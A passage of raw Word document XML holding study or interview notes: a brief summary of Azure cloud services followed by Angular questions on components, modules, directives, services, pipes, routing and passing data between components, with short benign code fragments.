    </w:p>
    <w:p w14:paraId="318AD68C"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35A24">
          <v:rect id="_x0000_i3728" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3655763A"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Networking Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A55FD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 (VNet):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Create isolated networks in Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5AB3F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ad Balancer:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Distribute incoming network traffic across VMs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B6E4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Gateway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Application layer (7) load balancer with SSL termination, WAF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57679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PN Gateway &amp; ExpressRoute:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Secure connectivity between on-prem and Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EE846"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F5E5D5">
          <v:rect id="_x0000_i3729" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2991910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DevOps &amp; CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075C44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r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Tools for CI/CD, agile planning, repo management, testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8F3D3"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itHub Actions for Azure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Build, test, and deploy code using GitHub directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEB96B"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ECC2E">
          <v:rect id="_x0000_i3730" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C40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Security &amp; Identity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54236BB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ctive Directory (AAD):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Identity and access management for apps, users, services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8E88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ey Vault:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Securely store secrets, keys, and certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2C9B9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Defender for Cloud:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Threat protection and security posture management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1958E98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6BFC91">
          <v:rect id="_x0000_i3731" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="03030648"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Monitoring &amp; Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614BAC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onitor:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Collect, analyze, and act on telemetry data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DDD68"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g Analytics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Query and analyze logs from across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A338D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Insights:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Performance monitoring for live web apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DAE705"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52A42">
          <v:rect id="_x0000_i3732" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD88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AI, ML &amp; Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDACB5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gnitive Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Pre-trained AI APIs (vision, speech, language).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B750A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achine Learning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>End-to-end ML lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9CCE5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ynapse Analytics:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Powerful analytics with SQL + Spark integration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA391C7"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2E8D0">
          <v:rect id="_x0000_i3733" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C5A6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9. Containers &amp; Serverless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC51CD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Instances (ACI):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Run containers without managing servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EFAAB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Registry (ACR):</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Private Docker container registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574DCD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 Logic Apps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Event-driven and low-code workflows respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F49CE79"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DA4E4E">
          <v:rect id="_x0000_i3734" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82B6D2"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0. IoT &amp; Event-Driven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAC7F5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IoT Hub:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Manage IoT devices and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569DF98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Event Grid / Service Bus / Event Hubs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C632D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Event routing and messaging between services or systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE04634" w14:textId="3470C728" w:rsidR="009245ED" w:rsidRPr="00CE4B95"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735" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908D2FF" w14:textId="77777777"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1293657E" w14:textId="19914484" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B" w:rsidP="00E8719B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="918" w:name="_Toc197868132"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Angular</w:t>
      </w:r>
      <w:bookmarkEnd w:id="918"/>
    </w:p>
    <w:p w14:paraId="2028D18F" w14:textId="75FE6615" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF250E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="919" w:name="_Toc197868133"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the components in the Angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="919"/>
    </w:p>
    <w:p w14:paraId="0645E2A7" w14:textId="491A22A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the core building blocks of an application are </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>components</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here are the main </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>components and essential parts of the Angular architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4214D8B7"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D9D5F2">
          <v:rect id="_x0000_i3736" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CAB93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omponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6030AA4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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> controls a part of the screen (UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460064B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consists of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823B56B"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xml:space="preserve"> – contains logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3788E"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xml:space="preserve"> – defines the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13649949"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xml:space="preserve"> – styling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155933C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1A23295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51F69BB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7CC1A26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component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7F8C0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72CB1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 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AA1E34"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F15491">
          <v:rect id="_x0000_i3737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155AC98"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Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB3F2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Module</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NgModule) groups components, directives, pipes, and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46427F4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root module</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is AppModule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0019A4E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2D8112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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6616D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AFD81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16027D3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889A48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5379C62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62C98">
          <v:rect id="_x0000_i3738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B4A55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Template</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A387B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s the HTML view of the component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF6B1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 include Angular syntax: *ngIf, *ngFor, {{ }} (interpolation), event binding, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1BC5E2"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9AEF8">
          <v:rect id="_x0000_i3739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8341B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Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CB3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Decorators like @Component, @NgModule, etc., provide </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to tell Angular how to process classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06D49D"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2A1B37">
          <v:rect id="_x0000_i3740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="571744C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5. Directive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B76E6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class that modifies the DOM or behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4213178C"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w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., *ngIf, *ngFor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B1D30"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w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., [ngClass], [ngStyle])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1BB7A5"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62CC85">
          <v:rect id="_x0000_i3741" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1160FC8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6. Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C37FE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reusable business logic or data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770DE2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Provided using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA540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93691F3"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Service { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D89BEF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4CF0D2">
          <v:rect id="_x0000_i3742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7870D41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7. Pipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B854A9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s data in templates (e.g., {{ dateValue | date }}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638AC989"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F6E5A">
          <v:rect id="_x0000_i3743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E626855"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8. Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00495D6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Router manages navigation between views (pages/components).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198FCC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3CB251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home', component: HomeComponent },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE63FE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2EB57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91FCE">
          <v:rect id="_x0000_i3744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5998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720FF2C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ngular Component = Class + Template + Styles + Metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1F6F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et me know if you want a visual component diagram or folder structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068BD35F" w14:textId="0043FDF5"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745" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34EEB6" w14:textId="34758BC9" w:rsidR="00B21219" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF250E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="920" w:name="_Toc197868134"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to pass data from components in Angular</w:t>
      </w:r>
      <w:r w:rsidR="00B21219" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="920"/>
    </w:p>
    <w:p w14:paraId="567E13AF" w14:textId="3A1BF61B" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1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data can be passed between components using several standard mechanisms depending on the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>direction of communication</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC602C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026EAD">
          <v:rect id="_x0000_i3746" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="706677B1"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Parent to Child (Input Binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260ABFDB"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Input() decorator to pass data </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from parent to child component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F067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0F577E7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childMessage]="parentData"&gt;&lt;/app-child&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A508D"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7D10FE1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put() childMessage: string;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF0ECDC"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CDCD5">
          <v:rect id="_x0000_i3747" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB7D6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Child to Parent (Output Binding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC79FB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Output() decorator with EventEmitter to send data </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>from child to parent component</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446A5D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55540C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utput() messageEvent = new EventEmitter&lt;string&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465199C" w14:textId="77777777" w:rsidR="003B3B1E" w:rsidRPr="003C7C02" w:rsidRDefault="003B3B1E" w:rsidP="003C7C02">
      <w:pPr>
